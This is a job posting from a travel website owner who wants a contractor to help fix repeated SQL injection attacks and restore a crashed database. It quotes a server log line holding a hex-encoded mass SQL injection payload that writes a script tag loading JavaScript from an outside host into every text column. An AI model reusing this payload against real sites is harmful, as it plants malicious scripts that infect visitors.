We have a growing travel website that has been down for the past two weeks. We have been experiencing repeated attacks - sql injections that crash our database. Our developer has tried to fix this but has not been able to, due to time allotment, she works on a part-time basis and the fact that we can't restore database independently because of shared hosting environment/knowledge. We have been trying fixes but have not been able to do it yet. And our host has extremely limited availability to restore the db when it is crashes. So I would need someone to review our fixes, and show me or teach me how to fix this manually in the code and then copy the database and restore it myself, and then make sure we are tightened up and secure against other attacks. Let's discuss rates and capabilities. The sooner the better.
Here is one of the hacks
41.232.166.49 - - [30/Jun/2008:17:02:38 +0000] "GET /filename.aspx?letter=A;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E737570706164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200
Some posts about it
http://www.secureworks.com/research/blog/index.php/2008/6/4/new-round-of-mass-sql-injections/
http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1318860,00.html
http://www.microsoft.com/technet/security/advisory/954462.mspx
- Location: Somerville
- This is a part-time job.
- This is a contract job.
- Principals only. Recruiters, please don't contact this job poster.
- Please, no phone calls about this job!
- Please do not contact job poster about other services, products or commercial interests.